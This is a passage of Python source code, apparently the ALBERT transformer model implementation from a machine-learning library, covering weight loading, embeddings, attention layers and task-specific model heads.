            or "AdamWeightDecayOptimizer_1" in name
            or "global_step" in name
        ):
            logger.info(f"Skipping {'/'.join(name)}")
            continue
        pointer = model
        for m_name in name:
            if re.fullmatch(r"[A-Za-z]+_\d+", m_name):
                scope_names = re.split(r"_(\d+)", m_name)
            else:
                scope_names = [m_name]

            if scope_names[0] == "kernel" or scope_names[0] == "gamma":
                pointer = getattr(pointer, "weight")
            elif scope_names[0] == "output_bias" or scope_names[0] == "beta":
                pointer = getattr(pointer, "bias")
            elif scope_names[0] == "output_weights":
                pointer = getattr(pointer, "weight")
            elif scope_names[0] == "squad":
                pointer = getattr(pointer, "classifier")
            else:
                try:
                    pointer = getattr(pointer, scope_names[0])
                except AttributeError:
                    logger.info(f"Skipping {'/'.join(name)}")
                    continue
            if len(scope_names) >= 2:
                num = int(scope_names[1])
                pointer = pointer[num]

        if m_name[-11:] == "_embeddings":
            pointer = getattr(pointer, "weight")
        elif m_name == "kernel":
            array = np.transpose(array)
        try:
            if pointer.shape != array.shape:
                raise ValueError(f"Pointer shape {pointer.shape} and array shape {array.shape} mismatched")
        except AssertionError as e:
            e.args += (pointer.shape, array.shape)
            raise
        print(f"Initialize PyTorch weight {name} from {original_name}")
        pointer.data = torch.from_numpy(array)

    return model


class AlbertEmbeddings(nn.Module):
    """
    Construct the embeddings from word, position and token_type embeddings.
    """

    def __init__(self, config):
        super().__init__()
        self.word_embeddings = nn.Embedding(config.vocab_size, config.embedding_size, padding_idx=config.pad_token_id)
        self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.embedding_size)
        self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.embedding_size)

        # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
        # any TensorFlow checkpoint file
        self.LayerNorm = nn.LayerNorm(config.embedding_size, eps=config.layer_norm_eps)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

        # position_ids (1, len position emb) is contiguous in memory and exported when serialized
        self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
        self.position_embedding_type = getattr(config, "position_embedding_type", "absolute")
        if version.parse(torch.__version__) > version.parse("1.6.0"):
            self.register_buffer(
                "token_type_ids",
                torch.zeros(self.position_ids.size(), dtype=torch.long),
                persistent=False,
            )

    # Copied from transformers.models.bert.modeling_bert.BertEmbeddings.forward
    def forward(
        self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None, past_key_values_length=0
    ):
        if input_ids is not None:
            input_shape = input_ids.size()
        else:
            input_shape = inputs_embeds.size()[:-1]

        seq_length = input_shape[1]

        if position_ids is None:
            position_ids = self.position_ids[:, past_key_values_length : seq_length + past_key_values_length]

        # Setting the token_type_ids to the registered buffer in constructor where it is all zeros, which usually occurs
        # when its auto-generated, registered buffer helps users when tracing the model without passing token_type_ids, solves
        # issue #5664
        if token_type_ids is None:
            if hasattr(self, "token_type_ids"):
                buffered_token_type_ids = self.token_type_ids[:, :seq_length]
                buffered_token_type_ids_expanded = buffered_token_type_ids.expand(input_shape[0], seq_length)
                token_type_ids = buffered_token_type_ids_expanded
            else:
                token_type_ids = torch.zeros(input_shape,
dtype=torch.long, device=self.position_ids.device) if inputs_embeds is None: inputs_embeds = self.word_embeddings(input_ids) token_type_embeddings = self.token_type_embeddings(token_type_ids) embeddings = inputs_embeds + token_type_embeddings if self.position_embedding_type == "absolute": position_embeddings = self.position_embeddings(position_ids) embeddings += position_embeddings embeddings = self.LayerNorm(embeddings) embeddings = self.dropout(embeddings) return embeddings class AlbertAttention(nn.Module): def __init__(self, config): super().__init__() if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"): raise ValueError( f"The hidden size ({config.hidden_size}) is not a multiple of the number of attention " f"heads ({config.num_attention_heads}" ) self.num_attention_heads = config.num_attention_heads self.hidden_size = config.hidden_size self.attention_head_size = config.hidden_size // config.num_attention_heads self.all_head_size = self.num_attention_heads * self.attention_head_size self.query = nn.Linear(config.hidden_size, self.all_head_size) self.key = nn.Linear(config.hidden_size, self.all_head_size) self.value = nn.Linear(config.hidden_size, self.all_head_size) self.attention_dropout = nn.Dropout(config.attention_probs_dropout_prob) self.output_dropout = nn.Dropout(config.hidden_dropout_prob) self.dense = nn.Linear(config.hidden_size, config.hidden_size) self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps) self.pruned_heads = set() self.position_embedding_type = getattr(config, "position_embedding_type", "absolute") if self.position_embedding_type == "relative_key" or self.position_embedding_type == "relative_key_query": self.max_position_embeddings = config.max_position_embeddings self.distance_embedding = nn.Embedding(2 * config.max_position_embeddings - 1, self.attention_head_size) # Copied from transformers.models.bert.modeling_bert.BertSelfAttention.transpose_for_scores def transpose_for_scores(self, x): new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size) x = x.view(*new_x_shape) return x.permute(0, 2, 1, 3) def prune_heads(self, heads): if len(heads) == 0: return heads, index = find_pruneable_heads_and_indices( heads, self.num_attention_heads, self.attention_head_size, self.pruned_heads ) # Prune linear layers self.query = prune_linear_layer(self.query, index) self.key = prune_linear_layer(self.key, index) self.value = prune_linear_layer(self.value, index) self.dense = prune_linear_layer(self.dense, index, dim=1) # Update hyper params and store pruned heads self.num_attention_heads = self.num_attention_heads - len(heads) self.all_head_size = self.attention_head_size * self.num_attention_heads self.pruned_heads = self.pruned_heads.union(heads) def forward(self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False): mixed_query_layer = self.query(hidden_states) mixed_key_layer = self.key(hidden_states) mixed_value_layer = self.value(hidden_states) query_layer = self.transpose_for_scores(mixed_query_layer) key_layer = self.transpose_for_scores(mixed_key_layer) value_layer = self.transpose_for_scores(mixed_value_layer) # Take the dot product between "query" and "key" to get the raw attention scores. 
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2)) attention_scores = attention_scores / math.sqrt(self.attention_head_size) if attention_mask is not None: # Apply the attention mask is (precomputed for all layers in BertModel forward() function) attention_scores = attention_scores + attention_mask if self.position_embedding_type == "relative_key" or self.position_embedding_type == "relative_key_query": seq_length = hidden_states.size()[1] position_ids_l = torch.arange(seq_length, dtype=torch.long, device=hidden_states.device).view(-1, 1) position_ids_r = torch.arange(seq_length, dtype=torch.long, device=hidden_states.device).view(1, -1) distance = position_ids_l - position_ids_r positional_embedding = self.distance_embedding(distance + self.max_position_embeddings - 1) positional_embedding = positional_embedding.to(dtype=query_layer.dtype) # fp16 compatibility if self.position_embedding_type == "relative_key": relative_position_scores = torch.einsum("bhld,lrd->bhlr", query_layer, positional_embedding) attention_scores = attention_scores + relative_position_scores elif self.position_embedding_type == "relative_key_query": relative_position_scores_query = torch.einsum("bhld,lrd->bhlr", query_layer, positional_embedding) relative_position_scores_key = torch.einsum("bhrd,lrd->bhlr", key_layer, positional_embedding) attention_scores = attention_scores + relative_position_scores_query + relative_position_scores_key # Normalize the attention scores to probabilities. attention_probs = nn.Softmax(dim=-1)(attention_scores) # This is actually dropping out entire tokens to attend to, which might # seem a bit unusual, but is taken from the original Transformer paper. attention_probs = self.attention_dropout(attention_probs) # Mask heads if we want to if head_mask is not None: attention_probs = attention_probs * head_mask context_layer = torch.matmul(attention_probs, value_layer) context_layer = context_layer.transpose(2, 1).flatten(2) projected_context_layer = self.dense(context_layer) projected_context_layer_dropout = self.output_dropout(projected_context_layer) layernormed_context_layer = self.LayerNorm(hidden_states + projected_context_layer_dropout) return (layernormed_context_layer, attention_probs) if output_attentions else (layernormed_context_layer,) class AlbertLayer(nn.Module): def __init__(self, config): super().__init__() self.config = config self.chunk_size_feed_forward = config.chunk_size_feed_forward self.seq_len_dim = 1 self.full_layer_layer_norm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps) self.attention = AlbertAttention(config) self.ffn = nn.Linear(config.hidden_size, config.intermediate_size) self.ffn_output = nn.Linear(config.intermediate_size, config.hidden_size) self.activation = ACT2FN[config.hidden_act] self.dropout = nn.Dropout(config.hidden_dropout_prob) def forward( self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False, output_hidden_states=False ): attention_output = self.attention(hidden_states, attention_mask, head_mask, output_attentions) ffn_output = apply_chunking_to_forward( self.ff_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output[0], ) hidden_states = self.full_layer_layer_norm(ffn_output + attention_output[0]) return (hidden_states,) + attention_output[1:] # add attentions if we output them def ff_chunk(self, attention_output): ffn_output = self.ffn(attention_output) ffn_output = self.activation(ffn_output) ffn_output = self.ffn_output(ffn_output) return ffn_output class 
AlbertLayerGroup(nn.Module): def __init__(self, config): super().__init__() self.albert_layers = nn.ModuleList([AlbertLayer(config) for _ in range(config.inner_group_num)]) def forward( self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False, output_hidden_states=False ): layer_hidden_states = () layer_attentions = () for layer_index, albert_layer in enumerate(self.albert_layers): layer_output = albert_layer(hidden_states, attention_mask, head_mask[layer_index], output_attentions) hidden_states = layer_output[0] if output_attentions: layer_attentions = layer_attentions + (layer_output[1],) if output_hidden_states: layer_hidden_states = layer_hidden_states + (hidden_states,) outputs = (hidden_states,) if output_hidden_states: outputs = outputs + (layer_hidden_states,) if output_attentions: outputs = outputs + (layer_attentions,) return outputs # last-layer hidden state, (layer hidden states), (layer attentions) class AlbertTransformer(nn.Module): def __init__(self, config): super().__init__() self.config = config self.embedding_hidden_mapping_in = nn.Linear(config.embedding_size, config.hidden_size) self.albert_layer_groups = nn.ModuleList([AlbertLayerGroup(config) for _ in range(config.num_hidden_groups)]) def forward( self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False, output_hidden_states=False, return_dict=True, ): hidden_states = self.embedding_hidden_mapping_in(hidden_states) all_hidden_states = (hidden_states,) if output_hidden_states else None all_attentions = () if output_attentions else None head_mask = [None] * self.config.num_hidden_layers if head_mask is None else head_mask for i in range(self.config.num_hidden_layers): # Number of layers in a hidden group layers_per_group = int(self.config.num_hidden_layers / self.config.num_hidden_groups) # Index of the hidden group group_idx = int(i / (self.config.num_hidden_layers / self.config.num_hidden_groups)) layer_group_output = self.albert_layer_groups[group_idx]( hidden_states, attention_mask, head_mask[group_idx * layers_per_group : (group_idx + 1) * layers_per_group], output_attentions, output_hidden_states, ) hidden_states = layer_group_output[0] if output_attentions: all_attentions = all_attentions + layer_group_output[-1] if output_hidden_states: all_hidden_states = all_hidden_states + (hidden_states,) if not return_dict: return tuple(v for v in [hidden_states, all_hidden_states, all_attentions] if v is not None) return BaseModelOutput( last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_attentions ) class AlbertPreTrainedModel(PreTrainedModel): """ An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained models. 
""" config_class = AlbertConfig load_tf_weights = load_tf_weights_in_albert base_model_prefix = "albert" _keys_to_ignore_on_load_missing = [r"position_ids"] def _init_weights(self, module): """Initialize the weights.""" if isinstance(module, nn.Linear): # Slightly different from the TF version which uses truncated_normal for initialization # cf https://github.com/pytorch/pytorch/pull/5617 module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) if module.bias is not None: module.bias.data.zero_() elif isinstance(module, nn.Embedding): module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) if module.padding_idx is not None: module.weight.data[module.padding_idx].zero_() elif isinstance(module, nn.LayerNorm): module.bias.data.zero_() module.weight.data.fill_(1.0) @dataclass class AlbertForPreTrainingOutput(ModelOutput): """ Output type of :class:`~transformers.AlbertForPreTraining`. Args: loss (`optional`, returned when ``labels`` is provided, ``torch.FloatTensor`` of shape :obj:`(1,)`): Total loss as the sum of the masked language modeling loss and the next sequence prediction (classification) loss. prediction_logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`): Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax). sop_logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, 2)`): Prediction scores of the next sequence prediction (classification) head (scores of True/False continuation before SoftMax). hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``): Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of shape :obj:`(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus the initial embedding outputs. attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``): Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_heads, sequence_length, sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads. """ loss: Optional[torch.FloatTensor] = None prediction_logits: torch.FloatTensor = None sop_logits: torch.FloatTensor = None hidden_states: Optional[Tuple[torch.FloatTensor]] = None attentions: Optional[Tuple[torch.FloatTensor]] = None ALBERT_START_DOCSTRING = r""" This model inherits from :class:`~transformers.PreTrainedModel`. Check the superclass documentation for the generic methods the library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads etc.) This model is also a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`__ subclass. Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and behavior. Args: config (:class:`~transformers.AlbertConfig`): Model configuration class with all the parameters of the model. Initializing with a config file does not load the weights associated with the model, only the configuration. Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights. 
""" ALBERT_INPUTS_DOCSTRING = r""" Args: input_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`): Indices of input sequence tokens in the vocabulary. Indices can be obtained using :class:`~transformers.AlbertTokenizer`. See :meth:`transformers.PreTrainedTokenizer.__call__` and :meth:`transformers.PreTrainedTokenizer.encode` for details. `What are input IDs? <../glossary.html#input-ids>`__ attention_mask (:obj:`torch.FloatTensor` of shape :obj:`({0})`, `optional`): Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``: - 1 for tokens that are **not masked**, - 0 for tokens that are **masked**. `What are attention masks? <../glossary.html#attention-mask>`__ token_type_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`): Segment token indices to indicate first and second portions of the inputs. Indices are selected in ``[0, 1]``: - 0 corresponds to a `sentence A` token, - 1 corresponds to a `sentence B` token. `What are token type IDs? <../glossary.html#token-type-ids>`_ position_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`): Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0, config.max_position_embeddings - 1]``. `What are position IDs? <../glossary.html#position-ids>`_ head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`): Mask to nullify selected heads of the self-attention modules. Mask values selected in ``[0, 1]``: - 1 indicates the head is **not masked**, - 0 indicates the head is **masked**. inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`({0}, hidden_size)`, `optional`): Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation. This is useful if you want more control over how to convert :obj:`input_ids` indices into associated vectors than the model's internal embedding lookup matrix. output_attentions (:obj:`bool`, `optional`): Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned tensors for more detail. output_hidden_states (:obj:`bool`, `optional`): Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for more detail. return_dict (:obj:`bool`, `optional`): Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple. """ @add_start_docstrings( "The bare ALBERT Model transformer outputting raw hidden-states without any specific head on top.", ALBERT_START_DOCSTRING, ) class AlbertModel(AlbertPreTrainedModel): config_class = AlbertConfig base_model_prefix = "albert" def __init__(self, config, add_pooling_layer=True): super().__init__(config) self.config = config self.embeddings = AlbertEmbeddings(config) self.encoder = AlbertTransformer(config) if add_pooling_layer: self.pooler = nn.Linear(config.hidden_size, config.hidden_size) self.pooler_activation = nn.Tanh() else: self.pooler = None self.pooler_activation = None # Initialize weights and apply final processing self.post_init() def get_input_embeddings(self): return self.embeddings.word_embeddings def set_input_embeddings(self, value): self.embeddings.word_embeddings = value def _prune_heads(self, heads_to_prune): """ Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} ALBERT has a different architecture in that its layers are shared across groups, which then has inner groups. 
If an ALBERT model has 12 hidden layers and 2 hidden groups, with two inner groups, there is a total of 4 different layers. These layers are flattened: the indices [0,1] correspond to the two inner groups of the first hidden layer, while [2,3] correspond to the two inner groups of the second hidden layer. Any layer with in index other than [0,1,2,3] will result in an error. See base class PreTrainedModel for more information about head pruning """ for layer, heads in heads_to_prune.items(): group_idx = int(layer / self.config.inner_group_num) inner_group_idx = int(layer - group_idx * self.config.inner_group_num) self.encoder.albert_layer_groups[group_idx].albert_layers[inner_group_idx].attention.prune_heads(heads) @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=BaseModelOutputWithPooling, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions output_hidden_states = ( output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states ) return_dict = return_dict if return_dict is not None else self.config.use_return_dict if input_ids is not None and inputs_embeds is not None: raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time") elif input_ids is not None: input_shape = input_ids.size() elif inputs_embeds is not None: input_shape = inputs_embeds.size()[:-1] else: raise ValueError("You have to specify either input_ids or inputs_embeds") batch_size, seq_length = input_shape device = input_ids.device if input_ids is not None else inputs_embeds.device if attention_mask is None: attention_mask = torch.ones(input_shape, device=device) if token_type_ids is None: if hasattr(self.embeddings, "token_type_ids"): buffered_token_type_ids = self.embeddings.token_type_ids[:, :seq_length] buffered_token_type_ids_expanded = buffered_token_type_ids.expand(batch_size, seq_length) token_type_ids = buffered_token_type_ids_expanded else: token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device) extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2) extended_attention_mask = extended_attention_mask.to(dtype=self.dtype) # fp16 compatibility extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0 head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers) embedding_output = self.embeddings( input_ids, position_ids=position_ids, token_type_ids=token_type_ids, inputs_embeds=inputs_embeds ) encoder_outputs = self.encoder( embedding_output, extended_attention_mask, head_mask=head_mask, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = encoder_outputs[0] pooled_output = self.pooler_activation(self.pooler(sequence_output[:, 0])) if self.pooler is not None else None if not return_dict: return (sequence_output, pooled_output) + encoder_outputs[1:] return BaseModelOutputWithPooling( last_hidden_state=sequence_output, pooler_output=pooled_output, hidden_states=encoder_outputs.hidden_states, attentions=encoder_outputs.attentions, ) @add_start_docstrings( """ Albert Model with two heads on top as 
done during the pretraining: a `masked language modeling` head and a `sentence order prediction (classification)` head. """, ALBERT_START_DOCSTRING, ) class AlbertForPreTraining(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config) self.predictions = AlbertMLMHead(config) self.sop_classifier = AlbertSOPHead(config) # Initialize weights and apply final processing self.post_init() def get_output_embeddings(self): return self.predictions.decoder def set_output_embeddings(self, new_embeddings): self.predictions.decoder = new_embeddings def get_input_embeddings(self): return self.albert.embeddings.word_embeddings @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @replace_return_docstrings(output_type=AlbertForPreTrainingOutput, config_class=_CONFIG_FOR_DOC) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, sentence_order_label=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (``torch.LongTensor`` of shape ``(batch_size, sequence_length)``, `optional`): Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]`` sentence_order_label (``torch.LongTensor`` of shape ``(batch_size,)``, `optional`): Labels for computing the next sequence prediction (classification) loss. Input should be a sequence pair (see :obj:`input_ids` docstring) Indices should be in ``[0, 1]``. ``0`` indicates original order (sequence A, then sequence B), ``1`` indicates switched order (sequence B, then sequence A). 
Returns: Example:: >>> from transformers import AlbertTokenizer, AlbertForPreTraining >>> import torch >>> tokenizer = AlbertTokenizer.from_pretrained('albert-base-v2') >>> model = AlbertForPreTraining.from_pretrained('albert-base-v2') >>> input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1 >>> outputs = model(input_ids) >>> prediction_logits = outputs.prediction_logits >>> sop_logits = outputs.sop_logits """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output, pooled_output = outputs[:2] prediction_scores = self.predictions(sequence_output) sop_scores = self.sop_classifier(pooled_output) total_loss = None if labels is not None and sentence_order_label is not None: loss_fct = CrossEntropyLoss() masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1)) sentence_order_loss = loss_fct(sop_scores.view(-1, 2), sentence_order_label.view(-1)) total_loss = masked_lm_loss + sentence_order_loss if not return_dict: output = (prediction_scores, sop_scores) + outputs[2:] return ((total_loss,) + output) if total_loss is not None else output return AlbertForPreTrainingOutput( loss=total_loss, prediction_logits=prediction_scores, sop_logits=sop_scores, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) class AlbertMLMHead(nn.Module): def __init__(self, config): super().__init__() self.LayerNorm = nn.LayerNorm(config.embedding_size) self.bias = nn.Parameter(torch.zeros(config.vocab_size)) self.dense = nn.Linear(config.hidden_size, config.embedding_size) self.decoder = nn.Linear(config.embedding_size, config.vocab_size) self.activation = ACT2FN[config.hidden_act] self.decoder.bias = self.bias def forward(self, hidden_states): hidden_states = self.dense(hidden_states) hidden_states = self.activation(hidden_states) hidden_states = self.LayerNorm(hidden_states) hidden_states = self.decoder(hidden_states) prediction_scores = hidden_states return prediction_scores def _tie_weights(self): # To tie those two weights if they get disconnected (on TPU or when the bias is resized) self.bias = self.decoder.bias class AlbertSOPHead(nn.Module): def __init__(self, config): super().__init__() self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, config.num_labels) def forward(self, pooled_output): dropout_pooled_output = self.dropout(pooled_output) logits = self.classifier(dropout_pooled_output) return logits @add_start_docstrings( "Albert Model with a `language modeling` head on top.", ALBERT_START_DOCSTRING, ) class AlbertForMaskedLM(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config, add_pooling_layer=False) self.predictions = AlbertMLMHead(config) # Initialize weights and apply final processing self.post_init() def get_output_embeddings(self): return self.predictions.decoder def set_output_embeddings(self, new_embeddings): self.predictions.decoder = new_embeddings def get_input_embeddings(self): return self.albert.embeddings.word_embeddings 
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=MaskedLMOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`): Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]`` """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_outputs = outputs[0] prediction_scores = self.predictions(sequence_outputs) masked_lm_loss = None if labels is not None: loss_fct = CrossEntropyLoss() masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1)) if not return_dict: output = (prediction_scores,) + outputs[2:] return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output return MaskedLMOutput( loss=masked_lm_loss, logits=prediction_scores, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model transformer with a sequence classification/regression head on top (a linear layer on top of the pooled output) e.g. for GLUE tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForSequenceClassification(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.config = config self.albert = AlbertModel(config) self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, self.config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=SequenceClassifierOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for computing the sequence classification/regression loss. Indices should be in ``[0, ..., config.num_labels - 1]``. If ``config.num_labels == 1`` a regression loss is computed (Mean-Square loss), If ``config.num_labels > 1`` a classification loss is computed (Cross-Entropy). 
""" return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) pooled_output = outputs[1] pooled_output = self.dropout(pooled_output) logits = self.classifier(pooled_output) loss = None if labels is not None: if self.config.problem_type is None: if self.num_labels == 1: self.config.problem_type = "regression" elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int): self.config.problem_type = "single_label_classification" else: self.config.problem_type = "multi_label_classification" if self.config.problem_type == "regression": loss_fct = MSELoss() if self.num_labels == 1: loss = loss_fct(logits.squeeze(), labels.squeeze()) else: loss = loss_fct(logits, labels) elif self.config.problem_type == "single_label_classification": loss_fct = CrossEntropyLoss() loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1)) elif self.config.problem_type == "multi_label_classification": loss_fct = BCEWithLogitsLoss() loss = loss_fct(logits, labels) if not return_dict: output = (logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return SequenceClassifierOutput( loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for Named-Entity-Recognition (NER) tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForTokenClassification(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.albert = AlbertModel(config, add_pooling_layer=False) classifier_dropout_prob = ( config.classifier_dropout_prob if config.classifier_dropout_prob is not None else config.hidden_dropout_prob ) self.dropout = nn.Dropout(classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, self.config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=TokenClassifierOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`): Labels for computing the token classification loss. Indices should be in ``[0, ..., config.num_labels - 1]``. 
""" return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = outputs[0] sequence_output = self.dropout(sequence_output) logits = self.classifier(sequence_output) loss = None if labels is not None: loss_fct = CrossEntropyLoss() # Only keep active parts of the loss if attention_mask is not None: active_loss = attention_mask.view(-1) == 1 active_logits = logits.view(-1, self.num_labels) active_labels = torch.where( active_loss, labels.view(-1), torch.tensor(loss_fct.ignore_index).type_as(labels) ) loss = loss_fct(active_logits, active_labels) else: loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1)) if not return_dict: output = (logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return TokenClassifierOutput( loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear layers on top of the hidden-states output to compute `span start logits` 